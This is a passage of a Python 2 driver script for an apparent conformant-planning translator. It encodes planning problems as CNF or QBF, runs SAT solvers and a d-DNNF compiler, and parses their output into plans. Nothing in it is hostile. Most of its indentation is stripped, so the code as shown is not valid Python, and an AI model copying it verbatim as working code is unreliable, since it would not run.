print str(atom),
print ''
else:
result.append(relsat2model(l,n_atoms_init))
res = relsat.wait()
tokill.pop()
if(res < 0):
        pr('Error calling relsat -#a: %d ' % res)
sys.exit(1)
if not printit:
return result
def try_relsat(cnf2_nf, actions_nf, num=1):
global statline, erase, erasedebug
#raise Exception('relsat', 'file')
if(not os.access(Loc+'/relsat',os.F_OK)):
print "relsat executable doesn't exist"
raise Exception('relsat', 'file')
if num>1:
cmd4=[Loc+'/relsat','-#a',cnf2_nf]
else:
cmd4=[Loc+'/relsat',cnf2_nf]
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
relsat=subprocess.Popen(cmd4,bufsize=1000, stdout=subprocess.PIPE)
tokill.append(relsat.pid)
all_plan_atoms = []
for l in relsat.stdout:
plan_atoms = []
        if(l.startswith('UNSAT')):
            # collect and unregister relsat before the early return
            relsat.wait()
            tokill.pop()
            return False,[]
elif(l.startswith('Solution ')):
for i in l.split(': ')[1].split():
if(i in actions):
plan_atoms.append(i)
num -= 1
all_plan_atoms.append(plan_atoms)
if num == 0:
break
    # relsat may already have exited (fewer solutions than requested),
    # so the kill is best-effort
    try:
        os.kill(relsat.pid,15)
    except OSError, e:
        if e.errno != errno.ESRCH:
            raise
    res = relsat.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
# if(res < 0):
# pr('Error calling relsat -#c: %d ' % res)
# sys.exit(1)
statline += str(elapsed)
return True,all_plan_atoms
def try_siege(cnf2_nf, actions_nf):
global statline, erase, erasedebug
#raise Exception('siege', 'file')
if(not os.access(Loc+'/siege_v4',os.F_OK)):
print "siege_v4 executable doesn't exist"
raise Exception('siege', 'file')
cmd4=[Loc+'/siege_v4',cnf2_nf]
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
results_nf='siege.results'
erasedebug.add(results_nf)
weak_unlink(results_nf)
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
siege=subprocess.Popen(cmd4, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(siege.pid)
    res = siege.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
        pr('Error calling siege_v4: %d' % res)
raise Exception('siege', 'process')
statline += str(elapsed)
if(not os.access(os.path.abspath(results_nf),os.F_OK)):
print 'siege_v4 did not obtain results'
raise Exception('siege', 'file')
results_f=open(results_nf,'r')
result=results_f.readline()
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
sat=True
plan_atoms=[]
for w in result.split(' '):
if(w.startswith('unsat')):
sat=False
break
if(w in actions):
plan_atoms.append(w)
return sat, plan_atoms
def try_zchaff(cnf2_nf, actions_nf):
global statline, erase, erasedebug
cmd4=[Loc+'/zchaff',cnf2_nf]
pr(gen_log('Calling SAT solver'))
log(gen_log('--------- Calling', cmd4))
results_nf='zchaff.out'
erasedebug.add(results_nf)
weak_unlink(results_nf)
results_f=open(results_nf, 'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
zchaff=subprocess.Popen(cmd4, bufsize=-1, stdout=results_f, stderr=results_f )
tokill.append(zchaff.pid)
    res = zchaff.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling zchaff: %d' % res)
sys.exit(1)
statline += str(elapsed)
results_f=open(results_nf,'r')
actions_f=open(actions_nf,'r')
actions=set(actions_f.read().split(' ')[1:-1])
actions_f.close()
sat='bad'
plan_atoms=[]
for l in results_f.readlines():
log(l[0:-1])
line = l.split(' ')
if line[0].isdigit():
sat=True
for w in line:
if(w == 'Random'):
break
if(w in actions):
plan_atoms.append(w)
elif line[0].startswith('RESULT:'):
res = line[0].split('\t')
if(res[1].startswith('SAT')):
sat = True
elif (res[1].startswith('UNSAT')):
sat = False
else:
pr('Error processing zchaff output')
sys.exit(1)
if sat == 'bad':
pr('Error processing zchaff output, ac')
sys.exit(1)
return sat, plan_atoms
def cf2sat(nnf_nf, n_atoms_init, cnf2_nf, actions_nf ):
global statline
cmd3=[Loc+'/2sat',nnf_nf,str(n_atoms_init)]
pr(gen_log('Generating new CNF'))
log(gen_log('--------- Calling',cmd3))
tosat=subprocess.Popen(cmd3, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(tosat.pid)
res=tosat.wait();
tokill.pop()
if(res < 0):
pr('Error calling 2sat %d: ' % res)
sys.exit(1)
cnf2_f = open(cnf2_nf,'r')
line = cnf2_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf2_f.close()
try:
sat, plan_atoms = try_siege(cnf2_nf, actions_nf)
except Exception, inst:
if inst.args == ('siege', 'file'):
pr('siege_v4 failed. Trying with zchaff')
sat, plan_atoms = try_zchaff(cnf2_nf, actions_nf)
else:
raise
return sat, plan_atoms
#' nvars2 nclauses2 sat-time\n'
#' nnodes nedgest backtracks nodes searchtime\n'
def read_output_plannf(results_nf):
global statline, isprob
found = 'bad'
backtracks = 'bad'
nodes = 'bad'
time = 'bad'
prob = -1
plan_atoms = []
results_f=open(results_nf,'r')
reading_act = False
for l in results_f.readlines():
log(l[0:-1])
line = l.split(':')
if reading_act:
if line[0] == 'action':
plan_atoms.append(line[1].strip())
else:
reading_act = False
else:
if l.startswith('PLAN RESULT:'):
if line[1].strip() == 'FOUND':
found = True
elif line[1].strip() == 'NOT-FOUND':
found = False
elif l.startswith('NODES GENERATED:'):
nodes = line[1].strip()
elif l.startswith('BACKTRACKS:'):
backtracks = line[1].strip()
elif l.startswith('TIME ON SEARCHING:'):
time = line[1].strip()
elif l.startswith('un Plan:'):
reading_act = True
elif l.startswith('Found plan with probability'):
prob = float(l.split('=')[1].strip())
statline += backtracks + ';' + nodes + ';' + time
return found, prob, plan_atoms
def cf2mc(nnf_nf, n_atoms_init, num_s0s, actions2time_nf, vars2prob_nf ):
global statline, cleaning_functions, isprob
nnf_f = open(nnf_nf,'r')
line = nnf_f.readline().split()
nnodes = line[1]
nedges = line[2]
statline += nnodes + ';' + nedges + ';'
nnf_f.close()
cmd3=[Loc+'/plannf']
if not simple_prunning:
cmd3.append('-nsim')
if not strong_prunning:
cmd3.append('-nstr')
if most_likely_selection:
cmd3.append('-lik')
if isprob:
cmd3.extend(['-p',vars2prob_nf,actions2time_nf,nnf_nf])
pr(gen_log('Searching over probabilistic plan space using WMC over d-DNNF'))
else:
cmd3.extend(['-z',str(n_atoms_init),str(num_s0s),actions2time_nf,nnf_nf])
pr(gen_log('Searching over plan space using MC over d-DNNF'))
log(gen_log('--------- Calling',cmd3))
results_nf='plannf.out'
erasedebug.add(results_nf)
weak_unlink(results_nf)
results_f=open(results_nf, 'w')
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
plannf=subprocess.Popen(cmd3, bufsize=-1, stdout=results_f, stderr=results_f )
tokill.append(plannf.pid)
cleaning_functions.append([read_output_plannf,results_nf])
res = plannf.wait()
cleaning_functions.pop()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling plannf: %d' % res)
sys.exit(1)
results_f.close()
found, prob, plan_atoms = read_output_plannf(results_nf)
#statline += str(elapsed)
if isprob:
pr('Probability: %f' % prob)
statline += '\nPROBABILITY:' + str(prob)
return True, plan_atoms
else:
return found, plan_atoms
def is_prob( isprob_nf ):
isprob_f = open(isprob_nf,'r')
line = isprob_f.readline()
isprob_f.close()
return line.startswith('yes')
# NOTE: auxvars are still missing
class Atoms:
def atoms_add(self,listmap,time,var,value):
while time >= len(listmap):
listmap.append({})
listmap[time][var] = value
def atoms_add_action(self,time,var,lit):
self.atoms_add(self.action2str,time,var,lit)
self.atoms_add(self.str2action,time,lit,var)
def atoms_add_fluent(self,time,var,lit):
self.atoms_add(self.fluent2str,time,var,lit)
self.atoms_add(self.str2fluent,time,lit,var)
def atoms_add_effect(self,time,var,val):
self.atoms_add(self.effect2stract,time,var,val)
self.atoms_add(self.stract2effect,time,val,var)
def __init__(self,atoms_nf,auxvars_nf):
self.fluent2str = []
self.str2fluent = []
self.action2str = []
self.str2action = []
self.extravars = []
self.effect2stract = []
self.stract2effect = []
self.conditions = set()
self.last_time = -1
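        # Assumed atoms-file line format (inferred from the parsing below):
        #   v<num> <sep> <time>:<literal>[*]
        # where a trailing '*' marks an action variable and '(extra-room...'
        # entries are auxiliary padding variables.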
atoms_f = open(atoms_nf,'r')
for l in atoms_f:
line = l.split(' ',2)
var = int(line[0][1:])
svalue = line[2].split('*')
if len(svalue) > 1:
has_star = True
else:
has_star = False
value = svalue[0].strip()
if value.find(':') > 0:
var_time = value.split(':')
time = int(var_time[0])
self.last_time = max(time,self.last_time)
lit = var_time[1].lower()
if has_star:
self.atoms_add_action(time,var,lit)
else:
self.atoms_add_fluent(time,var,lit)
            elif value.startswith('(extra-room'):
self.extravars.append(var)
auxvars_f = open(auxvars_nf,'r')
for l in auxvars_f:
line = l.split(' ',4)
time = int(line[0])
auxvar = int(line[1])
act = int(line[3])
auxstr = frozenset(lug.condition2tuple(line[4].strip().lower()))
self.atoms_add_effect(time,auxvar,(act,auxstr))
for cond in auxstr:
self.conditions.add(cond)
#print 'TRANSLATOR:',self.effect2stract
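# concatenate_cnf prepends the clauses in new_cnf to a DIMACS file, patching
# the 'p cnf <nvars> <nclauses>' header; e.g. merging [[1, -2]] into a file
# headed 'p cnf 5 10' yields 'p cnf 5 11' followed by the clause '1 -2 0'.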
def concatenate_cnf(cnf_nf, new_cnf,overwrite=True,recalculate_nvars=False):
global erasedebug
if overwrite:
# rename file
cnfold_nf = cnf_nf + '.old'
erasedebug.add(cnfold_nf)
shutil.move(cnf_nf,cnfold_nf)
# load header of cnf_nf
cnfold_f = open(cnfold_nf,'r')
cnf_f = open(cnf_nf,'w')
else:
# newfile file
cnfnew_nf = cnf_nf + '.new'
erasedebug.add(cnfnew_nf)
# load header of cnf_nf
cnfold_f = open(cnf_nf,'r')
cnf_f = open(cnfnew_nf,'w')
line = cnfold_f.readline().split(' ')
# calculate new number of clauses (same number of vars)
nvars = int(line[2])
nclauses = int(line[3][0:-1])
new_nvars = nvars
if recalculate_nvars:
for clause in new_cnf:
for lit in clause:
new_nvars = max(new_nvars,abs(lit))
cnf_f.write("p cnf %d %d\n" % (new_nvars, nclauses+len(new_cnf)))
# new cnf
for clause in new_cnf:
for lit in clause:
cnf_f.write(str(lit)+' ')
cnf_f.write('0 \n')
# old cnf
for line in cnfold_f.readlines():
cnf_f.write(line)
cnf_f.close()
def simplify_cnf(cnf_nf):
global erasedebug
# rename file
cnfold_nf = cnf_nf + '.pre-simplify'
cnfold_simple_nf = cnfold_nf + '_simplified'
erasedebug.add(cnfold_nf)
erasedebug.add(cnfold_simple_nf)
shutil.move(cnf_nf,cnfold_nf)
cmd2 = [Loc+'/c2d_220','-in',cnfold_nf,'-simplify']
pr(gen_log('Simplifying CNF'))
log(gen_log('--------- Calling',cmd2))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
c2d=subprocess.Popen(cmd2, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(c2d.pid)
res = c2d.wait();
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling c2d: %d' % res)
sys.exit(1)
shutil.move(cnfold_simple_nf,cnf_nf)
def make_qbf(k,n_atoms_init,problem_nf,cnf_nf,atoms_nf,init_nf,actions_nf):
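    # Builds a QDIMACS encoding: the action variables are existentially
    # quantified, log2(|S0|) fresh 'bit' variables (universally quantified)
    # select an initial state, and the remaining variables are existential;
    # the clauses added below tie each bit assignment to the literals of one
    # S0 model.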
qbf_nf = problem_nf+'-'+str(k)+'.qdimacs'
models=do_enum_s0(n_atoms_init,atoms_nf,init_nf,False)
num_s0 = len(models)
    num_bits = int(math.log(max(num_s0-1,1))/math.log(2))+1  # max() guards num_s0 == 1 against log(0)
# Opening cnf
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
old_nvars = int(line[2])
old_nlines = int(line[3])
#for saving result
lines = []
# Quantifiers
# actions
l = ['e']
actions=set(file(actions_nf).readlines()[0].split()[1:])
l.extend(actions)
actions=set(actions)
l.append('0')
lines.append(l)
# bits
l = ['a']
for b in range(1,num_bits+1):
l.append(str(b+old_nvars))
l.append('0')
lines.append(l)
# rest
l = ['e']
for v in range(1,old_nvars+1):
if str(v) not in actions:
l.append(str(v))
l.append('0')
lines.append(l)
# Bits 2 state
counter = 0
new_lines = 0
for mod in models:
l = make_bits(counter,num_bits,old_nvars)
#print 'HLP',l, mod
for lit in mod:
lines.append(l[:])
lines[-1].extend([str(lit),'0'])
new_lines += 1
counter += 1
# Saving file2
qbf_f=open(qbf_nf,'w')
qbf_f.write("p cnf %s %d\n" % (num_bits+old_nvars, new_lines+old_nlines) )
for l in lines:
#print 'HLP', l
for a in l:
qbf_f.write(a+' ')
qbf_f.write('\n')
for line in cnf_f.readlines():
if '%' not in line:
qbf_f.write(line)
cnf_f.close()
qbf_f.close()
def cf2logic(method,dump_qbf=False):
global statline, plan_found, parallel, erasedebug, erase, isprob, use_lug, use_lug_last_layer
global init_horiz, end_horiz, extra_room
if method == 'cf2sat':
pr('Starting cf2sat: translating from conformant planning to SAT')
elif method == 'cf2mc':
pr('Starting cf2mc: translating from conformant planning to Compiling+Model Counting')
else:
pr('Error calling cf2logic: wrong method %s' % method)
sys.exit(1)
    # Translate the problem so that it doesn't use oneof
new_problem_nf=problem_nf+'2'
erasedebug.add(new_problem_nf)
os.system(Loc+'/oneof2clause.py '+problem_nf+' '+new_problem_nf)
#cf2sat files
base='full'
init_nf=base+'-init.cnf'
isprob_nf=base+'.isprob'
cnf_nf=base+'.cnf'
nnf_nf=cnf_nf+'.nnf'
partnnf_nf=nnf_nf+'.partcnf'
cnf2_nf=nnf_nf+'.cnf'
rfluents_nf=base+'.rfluents'
ifluents_nf=base+'.ifluents'
atoms_nf=base+'.atoms'
actions_nf=base+'.actions'
actions2time_nf=base+'.actions2time'
vars2prob_nf=base+'.vars2prob'
auxvars_nf=base+'.auxvars'
resolve='resolve_trace'
erase.add(partnnf_nf)
erase.add(resolve)
erasedebug.add(isprob_nf)
erasedebug.add(init_nf)
erasedebug.add(cnf_nf)
erasedebug.add(nnf_nf)
erasedebug.add(cnf2_nf)
erasedebug.add(rfluents_nf)
erasedebug.add(ifluents_nf)
erasedebug.add(atoms_nf)
erasedebug.add(actions_nf)
erasedebug.add(actions2time_nf)
erasedebug.add(vars2prob_nf)
erasedebug.add(auxvars_nf)
if use_lug:
lug_cnf_nf='cnf.out'
lug_dd_nf='dd.out'
lug_map_nf='mapping.out'
erasedebug.add(lug_cnf_nf)
erasedebug.add(lug_dd_nf)
erasedebug.add(lug_map_nf)
erasedebug.add(lug.debug_nf)
#$LUGDIR/lug2txt $domain $prob -cnf_out 0 0 -1 0 0 2&>lug2txt.out
cmd=[Loc+'/lug2txt',domain_nf,new_problem_nf]
if use_mutex:
cmd.append('-mutex')
if use_lug_persist:
cmd.append('-persist')
if not use_lug_props:
cmd.append('-no-props')
if not use_lug_effs:
cmd.append('-no-effs')
if not use_lug_acts:
cmd.append('-no-acts')
cmd.extend(['-cnf_out','0','0','-1','0','0'])
pr(gen_log('Generating LUG'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
devnull = open('/dev/null','w')
lug2txt=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=devnull )
tokill.append(lug2txt.pid)
res = lug2txt.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling lug2txt: %d' % res)
sys.exit(1)
stat_f.write('lug_time:'+str(elapsed)+'\n')
# LUG: Create structures for create CNF
use_lug_last_layer = use_lug_last_layer and use_lug_persist
mlug = lug.LUG( lug_map_nf, lug_cnf_nf, use_lug_last_layer )
level_off = mlug.get_level()
extra_room = mlug.get_n_extra()
if level_off > end_horiz:
            pr('Level off of LUG: NO solution for horiz < %d' % level_off)
sys.exit(1)
if level_off > init_horiz:
print 'Starting at',level_off,'because LUG level off'
init_horiz = level_off
consistent=False
rconsistent=False
thereisplan=False
n_atoms_init = -1
num_s0s = -1
new_cnf = []
for k in range(init_horiz,end_horiz+1):
if method == 'cf2sat' and statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nvars2 nclauses2 sat-time\n'
elif method == 'cf2mc' and statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nnodes nedges backtracks nodes searchtime\n'
else:
stat_f.write(statline+'\n')
statline = ''
statline += str(k) + ';'
pr('===== Horiz %d ===============' % k)
cmd=[Loc+'/cconf']
if(parallel):
cmd.extend(['-p'])
if extra_room > 0:
cmd.extend(['-x',str(extra_room)])
cmd.extend(['-k',str(k),'-f','-o','full@'+ cnf_nf,'-o','init@'+ init_nf,\
'-o','auxvars@'+auxvars_nf,\
'-o','rfluents@'+ rfluents_nf,'-o','ifluents@'+ ifluents_nf,'-o','atoms@'+ atoms_nf,\
'-o','actions@'+ actions_nf,'-o','actions2time@'+ actions2time_nf,\
'-o','isprob@'+ isprob_nf,'-o','vars2prob@'+ vars2prob_nf,\
domain_nf,new_problem_nf])
pr(gen_log('Generating CNF'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cconf=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=log_f, env={'C2D': Loc+'/c2d_220'} )
tokill.append(cconf.pid)
res = cconf.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling cconf: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
isprob = is_prob( isprob_nf )
if isprob:
print 'Probabilistic domain detected'
if method != 'cf2mc' and isprob:
            pr('Error: method %s doesn\'t support probabilistic conformant planning' % method)
sys.exit(1)
if exit_when_cnf:
pr('Cnf is ready...')
sys.exit(1)
if(n_atoms_init < 0):
init_f = open(init_nf,'r')
n_atoms_init = int(init_f.readline().split(' ')[2])
init_f.close()
if enum_s0: # For printing initial states and exit
do_enum_s0(n_atoms_init,atoms_nf,init_nf)
sys.exit(0)
if new_cnf == []:
matoms = Atoms(atoms_nf,auxvars_nf)
if use_lug:
new_cnf = mlug.get_cnf(matoms,n_atoms_init)
            elif extra_room > 0: # zero out the extra vars
new_cnf = []
for v in matoms.extravars:
new_cnf.append([-v])
elif use_lug and use_lug_last_again:
new_cnf_layer = mlug.get_cnf_layer(k)
new_cnf.extend(new_cnf_layer)
if use_lug or extra_room > 0:
concatenate_cnf(cnf_nf, new_cnf)
concatenate_cnf(init_nf, new_cnf, False, True)
if use_lug:
simplify_cnf(cnf_nf)
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf_f.close()
if(num_s0s < 0):
num_s0s = calc_num_s0s(init_nf)
stat_f.write('NUM_S0:'+str(num_s0s)+'\n')
if dump_qbf:
make_qbf(k,n_atoms_init,problem_nf,cnf_nf,atoms_nf,init_nf,actions_nf)
finish()
sys.exit(0)
if(not isprob and not consistent):
consistent = is_consistent(n_atoms_init, init_nf, cnf_nf)
if(consistent):
pr('Problem has at least one plan candidate since horizon ' + str(k))
if(isprob or consistent):
            # Probably -smooth_all should be preferred, but
            # it seems to make cf2mc fail on some blocks instances
cmd2 = [Loc+'/c2d_220','-in',cnf_nf,'-dt_method','3','-force',ifluents_nf,\
'-exist', rfluents_nf, '-smooth_all','-reduce','-keep_trivial_cls']
cmd2.append('-count')
pr(gen_log('Compiling from CNF to d-DNNF'))
log(gen_log('--------- Calling',cmd2))
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
c2d=subprocess.Popen(cmd2, bufsize=-1, stdout=log_f, stderr=log_f )
tokill.append(c2d.pid)
res = c2d.wait();
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if(res < 0):
pr('Error calling c2d: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
if(not isprob and not rconsistent):
rconsistent = is_really_consistent(n_atoms_init, num_s0s, actions_nf, nnf_nf)
if(rconsistent):
pr('Problem has at least one plan candidate for each s0 since horizon ' + str(k))
if(isprob or rconsistent):
if method == 'cf2sat':
found, plan_atoms = cf2sat(nnf_nf, n_atoms_init, cnf2_nf, actions_nf )
elif method == 'cf2mc':
found, plan_atoms = cf2mc(nnf_nf, n_atoms_init, num_s0s, actions2time_nf,\
vars2prob_nf )
if not found:
pr('solution not found')
if not isprob:
continue
else:
pr('solution FOUND')
pr('LAST_HORIZ='+str(k))
atom2fluent = calc_atom2fluent(atoms_nf)
pr('Plan: ')
plan=[]
for atom in plan_atoms:
action = atom2fluent[atom]
pr(str(atom2time[atom])+':'+str(action))
plan.append(action)
statline += '\nPLAN_LENGTH:' + str(len(plan_atoms))
save_plan(plan)
plan_found=True
break
if(not plan_found):
        pr(gen_log('Plan not found: horizon limit reached'))
def mysatplan(num_solutions):
global statline, plan_found, parallel, erasedebug, erase
global init_horiz, end_horiz
    # Translate the problem so that it doesn't use oneof
new_problem_nf=problem_nf+'2'
erasedebug.add(new_problem_nf)
os.system(Loc+'/oneof2clause.py '+problem_nf+' '+new_problem_nf)
#cf2sat files
base='full'
init_nf=base+'-init.cnf'
cnf_nf=base+'.cnf'
atoms_nf=base+'.atoms'
actions_nf=base+'.actions'
vars2prob_nf=base+'.vars2prob'
auxvars_nf=base+'.auxvars'
resolve='resolve_trace'
erase.add(resolve)
erasedebug.add(init_nf)
erasedebug.add(cnf_nf)
erasedebug.add(atoms_nf)
erasedebug.add(actions_nf)
erasedebug.add(auxvars_nf)
consistent=False
n_atoms_init = -1
num_s0s = -1
new_cnf = []
for k in range(init_horiz,end_horiz+1):
if statline == '' :
statline = 'horizon cconf-time nvars nclauses c2d-time nvars2 nclauses2 sat-time\n'
else:
stat_f.write(statline+'\n')
statline = ''
statline += str(k) + ';'
pr('===== Horiz %d ===============' % k)
cmd=[Loc+'/cconf']
if(parallel):
cmd.extend(['-p'])
        # -s for not simplifying the theory using C2D
cmd.extend(['-s','-k',str(k),'-f','-o','full@'+ cnf_nf,\
'-o','init@'+ init_nf,\
'-o','auxvars@'+auxvars_nf,\
'-o','atoms@'+ atoms_nf,\
'-o','actions@'+ actions_nf,\
domain_nf,new_problem_nf])
pr(gen_log('Generating CNF'))
log(gen_log('--------- Calling',cmd))
log_f.flush()
init_t = resource.getrusage(resource.RUSAGE_CHILDREN)[0]
cconf=subprocess.Popen(cmd, bufsize=-1, stdout=log_f, stderr=log_f, env={'C2D': Loc+'/c2d_220'} )
tokill.append(cconf.pid)
res = cconf.wait()
tokill.pop()
elapsed = resource.getrusage(resource.RUSAGE_CHILDREN)[0] - init_t
if( res < 0):
pr('Error calling cconf: %d' % res)
sys.exit(1)
statline += str(elapsed) + ';'
if exit_when_cnf:
pr('Cnf is ready...')
sys.exit(1)
if(n_atoms_init < 0):
init_f = open(init_nf,'r')
n_atoms_init = int(init_f.readline().split(' ')[2])
init_f.close()
if enum_s0: # For printing initial states and exit
do_enum_s0(n_atoms_init,atoms_nf,init_nf)
sys.exit(0)
if new_cnf == []:
matoms = Atoms(atoms_nf,auxvars_nf)
cnf_f = open(cnf_nf,'r')
line = cnf_f.readline().split(' ')
nvars = line[2]
nclauses = line[3][0:-1]
statline += nvars + ';' + nclauses + ';'
cnf_f.close()
if(num_s0s < 0):
num_s0s = calc_num_s0s(init_nf)
stat_f.write('NUM_S0:'+str(num_s0s)+'\n')
if(num_s0s > 1):
                print 'Error: running mysatplan but the number of initial states is > 1'
                print 'do you want to run the translator as a conformant planner?'
exit(1)
if(not consistent):
consistent = is_consistent(n_atoms_init, init_nf, cnf_nf)
if(consistent):
pr('Problem has at least one plan candidate since horizon ' + str(k))
if consistent:
found, all_plan_atoms = try_relsat(cnf_nf, actions_nf, num_solutions)
if not found:
pr('solution not found')
if not isprob:
continue
else:
pr('solution FOUND')
pr('LAST_HORIZ='+str(k))
atom2fluent = calc_atom2fluent(atoms_nf)
n=1
for plan_atoms in all_plan_atoms:
if num_solutions > 1:
pr('Plan ('+str(n)+'): ')
else:
pr('Plan: ')
plan=[]
for atom in plan_atoms:
action = atom2fluent[atom]
pr(str(atom2time[atom])+':'+str(action))
plan.append(action)
statline += '\nPLAN_LENGTH:' + str(len(plan_atoms))
if num_solutions > 1:
save_plan(plan,'.'+str(n))
else:
save_plan(plan)
n += 1
plan_found=True
break
if(not plan_found):
        pr(gen_log('Plan not found: horizon limit reached'))
# Init of main matters
init_horiz=0
end_horiz=100
parallel=True
dump_qbf=False
simple_prunning = True
strong_prunning = True
most_likely_selection = False
check_plan=False
do_debug=False
verbosity=10
extra_room=0
exit_when_cnf=False
use_lug=False
use_mutex=False
use_lug_last_again=True
use_lug_persist=False
use_lug_props = True
use_lug_effs = True
use_lug_acts = True
use_lug_last_layer = True
classical_planner='ff' # or 'lama'
extra_options = []
enum_s0 = False
num_solutions = 1
Loc_v='TRANSLATOR_HOME'
planner='translator'
remove_log=False
statline=''
cleaning_functions=[]
isprob=False
time_limit=0
# Default strategy
sstrategy='t0:1800'
prefix=''
plan_found=False
# files to keep on debug
erasedebug=set()
if len(sys.argv) < 3:
usage()
i=1
try:
while i < len(sys.argv):
if(sys.argv[i] == '-i'):
init_horiz = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-e'):
end_horiz = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-v'):
verbosity = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-s'):
sstrategy = sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-l'):
prefix = sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-t'):
time_limit = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-z'):
parallel = False
i += 1
elif(sys.argv[i] == '-qbf'):
dump_qbf = True
i += 1
elif(sys.argv[i] == '-f'):
remove_log = True
i += 1
elif(sys.argv[i] == '-c'):
check_plan = True
i += 1
elif(sys.argv[i] == '-d'):
do_debug = True
i += 1
elif(sys.argv[i] == '-nsol'):
num_solutions = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-nsim'):
simple_prunning = False
i += 1
elif(sys.argv[i] == '-nstr'):
strong_prunning = False
i += 1
elif(sys.argv[i] == '-lik'):
most_likely_selection = True
i += 1
elif(sys.argv[i] == '-x'):
extra_room = int(sys.argv[i+1])
i += 2
elif(sys.argv[i] == '-cnf'):
exit_when_cnf = True
i += 1
# Lug options
elif(sys.argv[i] == '-lug'):
use_lug = True
i += 1
elif(sys.argv[i] == '-mut'):
use_mutex = not use_mutex
i += 1
elif(sys.argv[i] == '-lper'):
use_lug_persist = not use_lug_persist
i += 1
elif(sys.argv[i] == '-lnag'):
use_lug_last_again = not use_lug_last_again
i += 1
elif(sys.argv[i] == '-ln_llay'):
use_lug_last_layer = not use_lug_last_layer
i += 1
elif(sys.argv[i] == '-lno_acts'):
use_lug_acts = not use_lug_acts
i += 1
elif(sys.argv[i] == '-lno_props'):
use_lug_props = not use_lug_props
i += 1
elif(sys.argv[i] == '-lno_effs'):
use_lug_effs = not use_lug_effs
i += 1
#cf2cs options
elif(sys.argv[i] == '-cp'):
classical_planner=sys.argv[i+1]
i += 2
elif(sys.argv[i] == '-trans'):
extra_options.extend(sys.argv[i+1].split(','))
i += 2
elif(sys.argv[i] == '-enum-s0'):
enum_s0 = True
i += 1
elif(sys.argv[i].startswith('-')):
usage()
else:
break
except:
print 'Error processing the options', sys.argv
sys.exit(1)
# If last file is a tar, assume it contains both files
[has_tar,domain_nf,problem_nf] = pddlsfromtar.get_pddls(sys.argv[i])
if i + 1 == len(sys.argv) and has_tar:
erasedebug.add(domain_nf)
erasedebug.add(problem_nf)
elif i + 2 > len(sys.argv):
usage()
else:
domain_nf=sys.argv[i]
problem_nf=sys.argv[i+1]
if(not os.access(os.path.abspath(domain_nf),os.F_OK) ):
print 'domain file %s does not exist' % domain_nf
sys.exit(1)
if(not os.access(os.path.abspath(problem_nf),os.F_OK) ):
print 'problem file %s does not exist' % problem_nf
sys.exit(1)
# Interchange problem_nf and domain_nf if they were passed in the wrong order
for l in file(problem_nf,'r'):
if '(define' in l and '(domain' in l:
tmp=problem_nf
problem_nf=domain_nf
domain_nf=tmp
print 'Domain and problem file interchanged. Usually the results are the same anyway\n'
break
# problem name
probname=problem_nf.split('/')[-1].split('.')[0]
if prefix == '':
    # strategy_name is only built further below (after the log file is open),
    # so derive an equivalent name directly from sstrategy here
    # (assumes no extra whitespace inside sstrategy)
    out=planner+'_'+sstrategy.replace(':','-').replace(';','_')+'_'+probname
else:
    out=prefix+'_'+probname
#output files
log_nf=out+'.log'
if(os.access(os.path.abspath(log_nf),os.F_OK)):
if(remove_log):
weak_unlink(log_nf)
else:
print 'log file exist:', log_nf
print 'erase it before or use \'-f\' option to overwrite it'
sys.exit(1)
log_f=open(log_nf,'w')
if use_lug and (not use_lug_acts and not use_lug_props and not use_lug_effs):
pr('Using lug, at least acts props or effects should be used')
sys.exit(1)
Loc=''
try:
Loc=os.environ[Loc_v]
if(Loc == '' or not os.access(Loc,os.F_OK)):
        pr('Environment var %s is not set to an existing directory' % Loc_v)
sys.exit(1)
except:
pass
